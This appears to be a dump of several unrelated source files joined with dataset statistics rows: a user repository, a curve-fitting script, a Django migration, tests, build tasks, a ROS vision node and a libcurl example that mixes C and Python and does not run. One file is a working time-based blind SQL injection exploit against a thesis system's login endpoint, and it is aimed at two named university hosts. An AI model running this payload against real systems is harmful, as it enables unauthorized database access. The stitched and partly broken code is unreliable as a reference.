from ...schemas.entities.user import UserInUpdate
from ...services.security import UserPasswordService
__all__ = ['UsersRepository']
# actually, where statement emits <BinaryExpression>, but linter supposes comparing result as bool
WhereStatement = TypeVar('WhereStatement', bound=Union[BinaryExpression, bool])
class UsersRepository(BaseRepository):
model: ClassVar[ModelType] = User
async def update_by_email(self, email: str, user_in_update: UserInUpdate) -> User:
update_data = self._exclude_unset_from_schema(user_in_update)
if 'email' in update_data:
if await self.check_email_is_taken(update_data['email']):
raise EmailInUpdateIsAlreadyTakenError
update_data.update(self._get_update_data_on_email_update())
if 'password' in update_data:
update_data.update(self._get_update_data_on_password_update(update_data['password']))
stmt = sa_update(User).where(User.email == email).values(**update_data)
return await self._return_from_statement(stmt)
@staticmethod
def _get_update_data_on_email_update() -> dict:
return {
'is_email_confirmed': False,
'email_confirmed_at': None,
'email_confirmation_link': uuid4()
}
@staticmethod
def _get_update_data_on_password_update(password: str) -> dict:
user = UserPasswordService(User()).change_password(password)
return {
'hashed_password': user.hashed_password,
'password_salt': user.password_salt
}
async def confirm_by_email(self, email: str) -> User:
return await self._confirm_by_where_statement(User.email == email)
async def confirm_by_link(self, link: str) -> User:
return await self._confirm_by_where_statement(User.email_confirmation_link == link)
async def _confirm_by_where_statement(self, where_statement: WhereStatement) -> User:
update_data = self._get_update_data_on_email_confirmation()
stmt = sa_update(User).where(where_statement).values(**update_data)
return await self._return_from_statement(stmt)
@staticmethod
def _get_update_data_on_email_confirmation() -> dict:
return {
'is_email_confirmed': True,
'email_confirmed_at': datetime.utcnow()
}
async def fetch_by_email(self, email: str) -> User:
stmt = sa_select(User).where(User.email == email)
return await self._fetch_entity(stmt)
async def fetch_by_id(self, id_: int) -> ModelType:
stmt = (
sa_select(self.model)
.where(self.model.id == id_)
)
return await self._fetch_entity(stmt)
async def check_email_is_taken(self, email: str) -> bool:
try:
_ = await self.fetch_by_email(email)
except EntityDoesNotExistError:
return False
else:
return True
| 34.742268 | 98 | 0.694659 | 395 | 3,370 | 5.605063 | 0.235443 | 0.072267 | 0.03523 | 0.04065 | 0.33785 | 0.278681 | 0.195122 | 0.195122 | 0.129178 | 0.129178 | 0 | 0.000762 | 0.221068 | 3,370 | 96 | 99 | 35.104167 | 0.842667 | 0.028487 | 0 | 0.12987 | 0 | 0 | 0.054401 | 0.007029 | 0 | 0 | 0 | 0 | 0 | 1 | 0.038961 | false | 0.090909 | 0.155844 | 0.025974 | 0.363636 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
7878f45b36afa40f0d3868d56e6815cb872b5fa0 | 713 | py | Python | docs/index-7.py | farisachugthai/rtdpy | ac5cd7100d4b8d256021acf4a358bd5c2c4c58ce | [
"MIT"
] | 5 | 2019-12-28T19:53:57.000Z | 2021-09-14T19:59:25.000Z | docs/index-7.py | farisachugthai/rtdpy | ac5cd7100d4b8d256021acf4a358bd5c2c4c58ce | [
"MIT"
] | 3 | 2019-08-19T11:29:01.000Z | 2020-11-10T21:09:41.000Z | docs/index-7.py | farisachugthai/rtdpy | ac5cd7100d4b8d256021acf4a358bd5c2c4c58ce | [
"MIT"
] | 5 | 2019-03-19T08:35:15.000Z | 2020-11-06T20:23:32.000Z | from scipy import optimize
# Generate noisy data from NCSTR system with tau=10 and n=2
a = rtdpy.Ncstr(tau=10, n=2, dt=1, time_end=50)
xdata = a.time
noisefactor = 0.01
ydata = a.exitage \
+ (noisefactor * (np.random.rand(a.time.size) - 0.5))
def f(xdata, tau, n):
a = rtdpy.Ncstr(tau=tau, n=n, dt=1, time_end=50)
return a.exitage
# Give initial guess of tau=5 and n=4
popt, pcov = optimize.curve_fit(f, xdata, ydata, p0=[5, 4],
bounds=(0, np.inf))
plt.plot(xdata, ydata, label='Impulse Experiment')
b = rtdpy.Ncstr(tau=popt[0], n=popt[1], dt=1, time_end=50)
plt.plot(xdata, b.exitage, label='RTD Fit')
plt.title(f'tau={popt[0]: .2f}, n={popt[1]: .2f}')
plt.legend() | 33.952381 | 59 | 0.635344 | 132 | 713 | 3.401515 | 0.439394 | 0.066815 | 0.08686 | 0.066815 | 0.080178 | 0 | 0 | 0 | 0 | 0 | 0 | 0.055077 | 0.185133 | 713 | 21 | 60 | 33.952381 | 0.717728 | 0.130435 | 0 | 0 | 1 | 0 | 0.098706 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.0625 | false | 0 | 0.0625 | 0 | 0.1875 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
787d74e97c95f1df67c3e62879aee9f69a021e02 | 1,653 | py | Python | Bugscan_exploits-master/exp_list/exp-2405.py | csadsl/poc_exp | e3146262e7403f19f49ee2db56338fa3f8e119c9 | [
"MIT"
] | 11 | 2020-05-30T13:53:49.000Z | 2021-03-17T03:20:59.000Z | Bugscan_exploits-master/exp_list/exp-2405.py | csadsl/poc_exp | e3146262e7403f19f49ee2db56338fa3f8e119c9 | [
"MIT"
] | 6 | 2020-05-13T03:25:18.000Z | 2020-07-21T06:24:16.000Z | Bugscan_exploits-master/exp_list/exp-2405.py | csadsl/poc_exp | e3146262e7403f19f49ee2db56338fa3f8e119c9 | [
"MIT"
] | 6 | 2020-05-30T13:53:51.000Z | 2020-12-01T21:44:26.000Z | #!usr/bin/env python
# *-* coding:utf-8 *-*
'''
name: TRS学位论文系统papercon处SQL注入
author: yichin
refer: http://www.wooyun.org/bugs/wooyun-2010-0124453
description:
paper/submit1.jsp POST
stacked queries; AND/OR time-based blind
google dork: intitle:"学位论文服务系统" ("dissertation service system")
'''
import time
def assign(service, arg):
if service == 'trs_lunwen':
return True, arg
def audit(arg):
url = arg + 'papercon'
delay_0 = 'action=login&r_code=%D1%A7%BA%C5%B2%BB%C4%DC%CE%AA%BF%D5&r_password=%C3%DC%C2%EB%B2%BB%C4%DC%CE%AA%BF%D5&code=test%27;waitfor%20delay%270:0:0%27--&password=dsdfaf'
delay_5 = 'action=login&r_code=%D1%A7%BA%C5%B2%BB%C4%DC%CE%AA%BF%D5&r_password=%C3%DC%C2%EB%B2%BB%C4%DC%CE%AA%BF%D5&code=test%27;waitfor%20delay%270:0:5%27--&password=dsdfaf'
    code, head, res, err, _ = curl.curl2(arg + 'papercon')  # this request looks redundant, but sending it first improves detection accuracy
content_type = 'Content-Type: application/x-www-form-urlencoded'
t1 = time.time()
code, head, res, err, _ = curl.curl2(url, post=delay_0, header=content_type)
#print code, head
if code >= 400:
return False
t2 = time.time()
code, head, res, err, _ = curl.curl2(url, post=delay_5, header=content_type)
if code >= 400:
return False
t3 = time.time()
#debug("t0:" + str(t2-t1) + " t5:" + str(t3-t2))
if(t1 + t3 - 2*t2) > 3:
security_hole("SQL Injection: " + url + " POST:" +delay_5)
if __name__ == '__main__':
from dummy import *
audit(assign('trs_lunwen','http://epaper.lib.bnu.edu.cn:8080/')[1])
audit(assign('trs_lunwen','http://thesis.lib.tsinghua.edu.cn:8001/')[1]) | 38.44186 | 179 | 0.630369 | 261 | 1,653 | 3.888889 | 0.45977 | 0.015764 | 0.023645 | 0.031527 | 0.393103 | 0.306404 | 0.283744 | 0.283744 | 0.283744 | 0.283744 | 0 | 0.071001 | 0.190563 | 1,653 | 43 | 180 | 38.44186 | 0.687593 | 0.206897 | 0 | 0.16 | 0 | 0.08 | 0.41256 | 0.283784 | 0 | 0 | 0 | 0 | 0 | 1 | 0.08 | false | 0.08 | 0.08 | 0 | 0.28 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
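The detection condition `(t1 + t3 - 2*t2) > 3` above compares two round-trip times so that shared network latency cancels out. A standalone sketch of that arithmetic (the timestamps are hypothetical values, not measurements from the script):

```python
# The script's check (t1 + t3 - 2*t2) > 3 rearranges to
# (t3 - t2) - (t2 - t1) > 3: the 5-second payload must take at least
# 3 seconds longer than the 0-second baseline, net of shared latency.
def looks_time_blind(t1, t2, t3, threshold=3):
    baseline = t2 - t1   # request carrying waitfor delay '0:0:0'
    delayed = t3 - t2    # request carrying waitfor delay '0:0:5'
    return (delayed - baseline) > threshold

print(looks_time_blind(0.0, 0.4, 5.9))  # delayed run ~5.1s slower -> True
print(looks_time_blind(0.0, 0.4, 0.9))  # no injected delay observed -> False
```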
787e44f31c1c1961203ac8ac66cfb4c727e970b2 | 519 | py | Python | migrations/0007_doubleentry_account.py | PyUnchained/books | 656d375765300accb1767a8ab1bf4b96c884539f | [
"MIT"
] | null | null | null | migrations/0007_doubleentry_account.py | PyUnchained/books | 656d375765300accb1767a8ab1bf4b96c884539f | [
"MIT"
] | 14 | 2019-10-23T00:01:18.000Z | 2022-03-11T23:38:52.000Z | migrations/0007_doubleentry_account.py | PyUnchained/books | 656d375765300accb1767a8ab1bf4b96c884539f | [
"MIT"
] | null | null | null | # Generated by Django 2.2.6 on 2020-01-24 00:50
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('books', '0006_auto_20200124_0048'),
]
operations = [
migrations.AddField(
model_name='doubleentry',
name='account',
field=models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, to='books.Account'),
preserve_default=False,
),
]
| 24.714286 | 112 | 0.637765 | 59 | 519 | 5.508475 | 0.677966 | 0.073846 | 0.086154 | 0.135385 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.081841 | 0.246628 | 519 | 20 | 113 | 25.95 | 0.749361 | 0.086705 | 0 | 0 | 1 | 0 | 0.125 | 0.048729 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.142857 | 0 | 0.357143 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
7883b1c92ae0cd35356f8bfc3d8f7d8485f000d8 | 687 | py | Python | tests/test-cli.py | zondo/pypkg | edbd2b1d8aab1c2c0de219ac74c16688939591b9 | [
"BSD-2-Clause-FreeBSD"
] | null | null | null | tests/test-cli.py | zondo/pypkg | edbd2b1d8aab1c2c0de219ac74c16688939591b9 | [
"BSD-2-Clause-FreeBSD"
] | null | null | null | tests/test-cli.py | zondo/pypkg | edbd2b1d8aab1c2c0de219ac74c16688939591b9 | [
"BSD-2-Clause-FreeBSD"
] | null | null | null | # TODO: update or remove this file
from pytest import raises
from pypkg import cli
def test_main(capsys):
cli.main([])
captured = capsys.readouterr()
assert "write me" in captured.err
def test_usage(capsys):
with raises(SystemExit):
cli.main(["-h"])
captured = capsys.readouterr()
assert "Usage:" in captured.out
def test_error():
with raises(SystemExit, match="input file not found"):
cli.main(["nosuchfile"])
def test_exception(mocker):
mocker.patch("pypkg.cli.run", side_effect=NotImplementedError)
with raises(SystemExit):
cli.main([])
with raises(NotImplementedError):
cli.main(["--trace"])
| 20.818182 | 66 | 0.656477 | 84 | 687 | 5.309524 | 0.5 | 0.078475 | 0.134529 | 0.134529 | 0.121076 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.215429 | 687 | 32 | 67 | 21.46875 | 0.827458 | 0.046579 | 0 | 0.3 | 0 | 0 | 0.101072 | 0 | 0 | 0 | 0 | 0.03125 | 0.1 | 1 | 0.2 | false | 0 | 0.1 | 0 | 0.3 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
7884640c82209137373642e0fa1bd092ed891be6 | 7,284 | py | Python | examples/_todo/http2-upload.py | karpierz/libcurl | 531bd28ab32fb07c152e5b5ca4bd4dbde059b9a8 | [
"Zlib"
] | null | null | null | examples/_todo/http2-upload.py | karpierz/libcurl | 531bd28ab32fb07c152e5b5ca4bd4dbde059b9a8 | [
"Zlib"
] | null | null | null | examples/_todo/http2-upload.py | karpierz/libcurl | 531bd28ab32fb07c152e5b5ca4bd4dbde059b9a8 | [
"Zlib"
] | null | null | null | #***************************************************************************
# _ _ ____ _
# Project ___| | | | _ \| |
# / __| | | | |_) | |
# | (__| |_| | _ <| |___
# \___|\___/|_| \_\_____|
#
# Copyright (C) 1998 - 2021, Daniel Stenberg, <daniel@haxx.se>, et al.
#
# This software is licensed as described in the file COPYING, which
# you should have received as part of this distribution. The terms
# are also available at https://curl.se/docs/copyright.html.
#
# You may opt to use, copy, modify, merge, publish, distribute and/or sell
# copies of the Software, and permit persons to whom the Software is
# furnished to do so, under the terms of the COPYING file.
#
# This software is distributed on an "AS IS" basis, WITHOUT WARRANTY OF ANY
# KIND, either express or implied.
#
#***************************************************************************
"""
Multiplexed HTTP/2 uploads over a single connection
"""
import sys
import ctypes as ct
import libcurl as lcurl
#include <curl/mprintf.h>
from curltestutils import * # noqa
from debug import dump
NUM_HANDLES = 1000
struct input {
FILE *in;
size_t bytes_read; # count up
CURL *hnd;
int num;
};
@lcurl.read_callback
def read_function(ptr, size, nmemb, stream):
struct input *i = stream;
size_t retcode = fread(ptr, size, nmemb, i->in);
i->bytes_read += retcode;
return retcode;
def debug_output(info_type, num: int, stream, data, size: int, no_hex: bool):
if info_type == lcurl.CURLINFO_TEXT:
char timebuf[60];
static time_t epoch_offset;
static int known_offset;
struct timeval tv;
time_t secs;
struct tm *now;
gettimeofday(&tv, NULL);
if(!known_offset) {
epoch_offset = time(NULL) - tv.tv_sec;
known_offset = 1;
}
secs = epoch_offset + tv.tv_sec;
now = localtime(&secs); # not thread safe but we do not care
curl_msnprintf(timebuf, sizeof(timebuf), "%02d:%02d:%02d.%06ld",
now->tm_hour, now->tm_min, now->tm_sec, (long)tv.tv_usec);
if num is None:
print("%s Info: %s" %
(timebuf, bytes(data[:size]).decode("utf-8")), end="",
file=stream)
else:
print("%s [%d] Info: %s" %
(timebuf, num, bytes(data[:size]).decode("utf-8")), end="",
file=stream)
else:
if info_type == lcurl.CURLINFO_HEADER_OUT: text = "=> Send header"
elif info_type == lcurl.CURLINFO_DATA_OUT: text = "=> Send data"
elif info_type == lcurl.CURLINFO_SSL_DATA_OUT: text = "=> Send SSL data"
elif info_type == lcurl.CURLINFO_HEADER_IN: text = "<= Recv header"
elif info_type == lcurl.CURLINFO_DATA_IN: text = "<= Recv data"
elif info_type == lcurl.CURLINFO_SSL_DATA_IN: text = "<= Recv SSL data"
else: return 0 # in case a new one is introduced to shock us
dump(text, num, stream, data, size, no_hex)
@lcurl.debug_callback
def debug_function(curl, info_type, data, size, userptr):
struct input *i = (struct input *)userptr;
num = i->num;
no_hex = True
debug_output(info_type, num, sys.stderr, data, size, no_hex)
return 0
static void setup(struct input *i, int num, const char *upload):
FILE *out;
char url[256];
char filename[128];
struct stat file_info;
curl_off_t uploadsize;
CURL *hnd;
hnd = i->hnd = lcurl.easy_init()
i->num = num;
curl_msnprintf(filename, 128, "dl-%d", num);
out = fopen(filename, "wb");
if(!out) {
fprintf(stderr, "error: could not open file %s for writing: %s\n", upload,
strerror(errno));
exit(1);
}
curl_msnprintf(url, 256, "https://localhost:8443/upload-%d", num);
# get the file size of the local file
if(stat(upload, &file_info)) {
fprintf(stderr, "error: could not stat file %s: %s\n", upload,
strerror(errno));
exit(1);
}
uploadsize = file_info.st_size;
i->in = fopen(upload, "rb");
if(!i->in) {
fprintf(stderr, "error: could not open file %s for reading: %s\n", upload,
strerror(errno));
exit(1);
}
# write to this file
curl_easy_setopt(hnd, CURLOPT_WRITEDATA, out);
# we want to use our own read function
lcurl.easy_setopt(hnd, lcurl.CURLOPT_READFUNCTION, read_function)
# read from this file
curl_easy_setopt(hnd, CURLOPT_READDATA, i);
# provide the size of the upload
curl_easy_setopt(hnd, CURLOPT_INFILESIZE_LARGE, uploadsize);
# send in the URL to store the upload as
curl_easy_setopt(hnd, CURLOPT_URL, url);
# upload please
lcurl.easy_setopt(hnd, lcurl.CURLOPT_UPLOAD, 1)
# please be verbose
lcurl.easy_setopt(hnd, lcurl.CURLOPT_VERBOSE, 1)
lcurl.easy_setopt(hnd, lcurl.CURLOPT_DEBUGFUNCTION, debug_function)
curl_easy_setopt(hnd, CURLOPT_DEBUGDATA, i);
# HTTP/2 please
curl_easy_setopt(hnd, CURLOPT_HTTP_VERSION, CURL_HTTP_VERSION_2_0);
# we use a self-signed test server, skip verification during debugging
lcurl.easy_setopt(hnd, lcurl.CURLOPT_SSL_VERIFYPEER, 0)
lcurl.easy_setopt(hnd, lcurl.CURLOPT_SSL_VERIFYHOST, 0)
if lcurl.CURLPIPE_MULTIPLEX > 0:
# wait for pipe connection to confirm
lcurl.easy_setopt(hnd, lcurl.CURLOPT_PIPEWAIT, 1)
/*
* Upload all files over HTTP/2, using the same physical connection!
*/
int main(int argc, char **argv)
struct input trans[NUM_HANDLES];
CURLM *multi_handle;
const char *filename = "index.html";
int num_transfers;
if len(argv) >= 1:
# if given a number, do that many transfers
num_transfers = int(argv[0])
if (!num_transfers || (num_transfers > NUM_HANDLES)):
num_transfers = 3 # a suitable low default
if len(argv) >= 2:
# if given a file name, upload this!
filename = argv[1]
else:
num_transfers = 3 # suitable default
# init a multi stack
multi_handle = lcurl.multi_init()
for i in range(num_transfers):
setup(&trans[i], i, filename);
# add the individual transfer
lcurl.multi_add_handle(multi_handle, trans[i].hnd)
curl_multi_setopt(multi_handle, CURLMOPT_PIPELINING, lcurl.CURLPIPE_MULTIPLEX)
# We do HTTP/2 so let's stick to one connection per host
lcurl.multi_setopt(multi_handle, lcurl.CURLMOPT_MAX_HOST_CONNECTIONS, 1)
still_running = ct.c_int(1) # keep number of running handles
while still_running.value:
mc: lcurl.CURLMcode = lcurl.multi_perform(multi_handle,
ct.byref(still_running))
if still_running.value:
# wait for activity, timeout or "nothing"
mc = lcurl.multi_poll(multi_handle, None, 0, 1000, None)
if mc:
break;
lcurl.multi_cleanup(multi_handle)
for i in range(num_transfers):
lcurl.multi_remove_handle(multi_handle, trans[i].hnd)
lcurl.easy_cleanup(trans[i].hnd)
return 0
sys.exit(main())
| 31.128205 | 82 | 0.605711 | 965 | 7,284 | 4.38342 | 0.312953 | 0.030733 | 0.039953 | 0.034752 | 0.238061 | 0.185106 | 0.119622 | 0.053901 | 0.036879 | 0.018913 | 0 | 0.013503 | 0.267985 | 7,284 | 233 | 83 | 31.261803 | 0.77982 | 0.233251 | 0 | 0.137681 | 0 | 0 | 0.058577 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.036232 | null | null | 0.057971 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
7885663aa4d13fc0c192951f418e5a31c44b6f75 | 669 | py | Python | tasks.py | joeblackwaslike/pyramid_bootstrap | fc2ee51f9d2d3853a00e44d92c4635d61b638671 | [
"BSD-3-Clause"
] | 1 | 2018-10-03T14:28:54.000Z | 2018-10-03T14:28:54.000Z | tasks.py | joeblackwaslike/pyramid_bootstrap | fc2ee51f9d2d3853a00e44d92c4635d61b638671 | [
"BSD-3-Clause"
] | 2 | 2018-11-17T06:39:30.000Z | 2018-11-17T07:00:58.000Z | tasks.py | joeblackwaslike/pyramid_bootstrap | fc2ee51f9d2d3853a00e44d92c4635d61b638671 | [
"BSD-3-Clause"
] | null | null | null | from invoke import task
@task
def test(ctx):
ctx.run('pytest --cov tests')
@task
def install(ctx):
ctx.run('pip3 install -e ".[testing]"')
@task
def check(ctx):
ctx.run('pyroma .')
ctx.run('pylint pyramid_bootstrap')
ctx.run('pycodestyle')
@task
def clean(ctx):
ctx.run('rm -rf build dist')
@task(pre=[clean])
def build(ctx):
ctx.run('python3 setup.py sdist bdist_wheel')
@task
def upload(ctx, environment='production'):
    if environment == 'production':
        server = 'pypi'
    elif environment == 'test':
        server = 'test'
    else:
        raise ValueError('unknown environment: {}'.format(environment))
ctx.run(
'twine upload -r {} --sign --identity E23F8CA8 dist/*'.format(server))
| 17.153846 | 78 | 0.620329 | 89 | 669 | 4.640449 | 0.516854 | 0.116223 | 0.108959 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.011385 | 0.212257 | 669 | 38 | 79 | 17.605263 | 0.772296 | 0 | 0 | 0.192308 | 0 | 0 | 0.334828 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.230769 | false | 0 | 0.038462 | 0 | 0.269231 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
788bc7f4dda393bb2e1b1e58a66b9417d93958ac | 6,569 | py | Python | Autonomous_Control/Image_Processing/3_Coordinate_Transformation.py | tatsujin16/Intellectual_Robot_Contest_2019 | 2dfdcb11ecea991dbbf053f8a71dd7e0838c4626 | [
"BSD-3-Clause"
] | null | null | null | Autonomous_Control/Image_Processing/3_Coordinate_Transformation.py | tatsujin16/Intellectual_Robot_Contest_2019 | 2dfdcb11ecea991dbbf053f8a71dd7e0838c4626 | [
"BSD-3-Clause"
] | 1 | 2019-02-02T12:06:22.000Z | 2019-02-02T12:06:22.000Z | Autonomous_Control/Image_Processing/3_Coordinate_Transformation.py | tatsujin16/Intellectual_Robot_Contest_2019 | 2dfdcb11ecea991dbbf053f8a71dd7e0838c4626 | [
"BSD-3-Clause"
] | 1 | 2022-03-19T07:37:41.000Z | 2022-03-19T07:37:41.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import rospy
import cv2
import math
import numpy as np
from sensor_msgs.msg import Image
from cv_bridge import CvBridge, CvBridgeError
from geometry_msgs.msg import Twist
class first(object):
def __init__(self):
#sub
self._sub_tag0 = rospy.Subscriber('/tag0_info', Twist, self.callback_tag0)
self._sub_tag1 = rospy.Subscriber('/tag1_info', Twist, self.callback_tag1)
self._cv_image_sub = rospy.Subscriber('cv_image', Image, self.callback, 'img')
self._blue_sub = rospy.Subscriber('blue_image', Image, self.callback, 'blue')
self._red_sub = rospy.Subscriber('red_image',Image, self.callback, 'red')
self._yellow_sub = rospy.Subscriber('yellow_image', Image, self.callback,'yellow')
self._bridge = CvBridge()
#pub
self._cv_image2_pub = rospy.Publisher('cv_image2', Image, queue_size=1)
self._pub_redxy = rospy.Publisher('/red_xy', Twist, queue_size=1)
self._pub_bluexy = rospy.Publisher('/blue_xy', Twist, queue_size=1)
self._pub_yellowxy = rospy.Publisher('/yellow_xy', Twist, queue_size=1)
self._cam_posi = np.zeros(3, dtype = 'float64')
self._angle_r = np.zeros(3, dtype = 'float64')
self._local_tag1 = np.zeros(3, dtype = 'float64')
self._tag1_angle_r = np.zeros(3, dtype = 'float64')
self._vacuum_posi = np.zeros(1, dtype= 'float64')
def callback_tag0(self, message):
self._cam_posi[0] = message.linear.x
self._cam_posi[1] = message.linear.y
self._cam_posi[2] = message.linear.z
self._angle_r[0] = message.angular.x
self._angle_r[2] = message.angular.z
def callback_tag1(self, message1):
self._local_tag1[0] = message1.linear.x
self._local_tag1[1] = message1.linear.y
self._local_tag1[2] = message1.linear.z
self._tag1_angle_r[2] = message1.angular.z
self._vacuum_posi[0] = self._local_tag1[1] - 0.35
def callback(self, data, name):
global flag, FLAG, cv_image1, Mask_color
if(name == 'img'):
cv_image1 = self._bridge.imgmsg_to_cv2(data, 'bgr8')
flag = 1
elif(name == 'red' or name == 'blue' or name == 'yellow'):
Mask_color = self._bridge.imgmsg_to_cv2(data, 'mono8')
FLAG = 1
if(flag == 1 and FLAG == 1):
cv_image2 = self.get_Contours(Mask_color, cv_image1, name)
self._cv_image2_pub.publish(self._bridge.cv2_to_imgmsg(cv_image2, 'bgr8'))
def _Squaring(self, x, y):
Shaded = np.sqrt(x*x + y*y)
return Shaded
def get_Contours(self, mask_color, cv_image, color):
global count
count = 0
imaEdge, contours, hierarchy = cv2.findContours(mask_color,cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE)
if(len(contours) == 0):
if(color == 'red'):
red_xy = Twist()
red_xy.linear.x = 0
red_xy.linear.y = 0
self._pub_redxy.publish(red_xy)
print "4"
elif(color == 'blue'):
blue_xy = Twist()
blue_xy.linear.x = 0
blue_xy.linear.y = 0
self._pub_bluexy.publish(blue_xy)
print "5"
elif(color == 'yellow'):
yellow_xy = Twist()
yellow_xy.linear.x = 0
yellow_xy.linear.y = 0
self._pub_yellowxy.publish(yellow_xy)
print "6"
for kazu in range(len(contours)):
cnt = contours[kazu]
circularity, AREA, Radius = self.Circul_Level(cnt)
Radius = int(Radius)
if(circularity >= 0.80 and AREA >= 200):
x,y,w,h = cv2.boundingRect(cnt)
kari_center_x = x + Radius
kari_center_y = y + Radius
center_x = (kari_center_x - (cv_image.shape[1]/2))
center_y = (kari_center_y - (cv_image.shape[0]/2))*(-1)
cv_image = cv2.rectangle(cv_image,(x,y),(x+w,y+h), (0,255,0),2)
cv_image = cv2.circle(cv_image,(kari_center_x,kari_center_y),2,(0,255,0),-1)
a,b = self.Position_estimation(center_x, center_y)
AA,BB = self.Transform(a,b)
if(color == 'red'):
# print "red[%d] = (%lf,%lf)" %(kazu+1, AA, BB)
vacuum_dis = self._Squaring(AA, BB)
red_xy = Twist()
red_xy.linear.x = round(AA,2)
red_xy.linear.y = round(BB,2)
red_xy.angular.z = round(vacuum_dis,2)
self._pub_redxy.publish(red_xy)
count = count + 1
elif(color == 'blue'):
# print "blue[%d] = (%lf,%lf)" %(kazu+1, AA, BB)
vacuum_dis = self._Squaring(AA, BB)
blue_xy = Twist()
blue_xy.linear.x = round(AA,2)
blue_xy.linear.y = round(BB,2)
blue_xy.angular.z = round(vacuum_dis,2)
self._pub_bluexy.publish(blue_xy)
count = count + 1
elif(color == 'yellow'):
# print "yellow[%d] = (%lf,%lf)" %(kazu+1, AA, BB)
vacuum_dis = self._Squaring(AA, BB)
yellow_xy = Twist()
yellow_xy.linear.x = round(AA,2)
yellow_xy.linear.y = round(BB,2)
yellow_xy.angular.z = round(vacuum_dis,2)
self._pub_yellowxy.publish(yellow_xy)
count = count + 1
print "count = %d" %(count)
if(count == 0 and color == 'red'):
red_xy = Twist()
red_xy.linear.x = 0
red_xy.linear.y = 0
self._pub_redxy.publish(red_xy)
if(count == 0 and color == 'blue'):
blue_xy = Twist()
blue_xy.linear.x = 0
blue_xy.linear.y = 0
self._pub_bluexy.publish(blue_xy)
if(count == 0 and color == 'yellow'):
yellow_xy = Twist()
yellow_xy.linear.x = 0
yellow_xy.linear.y = 0
self._pub_yellowxy.publish(yellow_xy)
return cv_image
def Circul_Level(self, CNT):
area = cv2.contourArea(CNT)
length = cv2.arcLength(CNT, True)
Circularity = 4.0*np.pi*area/(length*length)
radius = np.sqrt(area/np.pi)
if(radius<0):
radius*(-1)
return Circularity, area, radius
def Position_estimation(self, C_X, C_Y):
fy = 968.412572
h = self._cam_posi[2] + 0.041
shita = self._angle_r[0]
C_X1 = abs(C_X)
C_Y1 = abs(C_Y)
delta_shita = math.atan2(C_Y1, fy)
if(C_Y <= 0.0):
a = shita + delta_shita
elif(C_Y > 0.0):
a = shita - delta_shita
yt = h / np.tan(a)
f_dash = np.sqrt(fy*fy + C_Y1*C_Y1)
xt = (C_X1*np.sqrt(yt*yt + h*h)) / f_dash
if(C_X < 0.0):
xt = xt*(-1)
return xt, yt
    # rotation matrix
def make_rot_mat(self, angle, c_x, c_y):
rot_matrix = [[np.cos(angle),np.sin(angle),c_x],[(-1)*np.sin(angle),np.cos(angle),c_y]]
rot_matrix = np.matrix(rot_matrix)
return rot_matrix
def Transform(self, ball_x, ball_y):
angle = (-1)*(self._tag1_angle_r[2])
c_x = self._local_tag1[0]
c_y = self._vacuum_posi[0]
from_camera_to_ball = np.array([ball_x, ball_y,1])
rot_mat = self.make_rot_mat(angle, c_x, c_y)
rot_xy = np.dot(rot_mat, from_camera_to_ball.reshape(3,1))
para_rot_x, para_rot_y = rot_xy[0, 0], rot_xy[1, 0]
return para_rot_x ,para_rot_y
if __name__ == '__main__':
rospy.init_node('senbetu')
first = first()
try:
flag = 0
FLAG = 0
count = 0
rospy.spin()
except KeyboardInterrupt:
pass
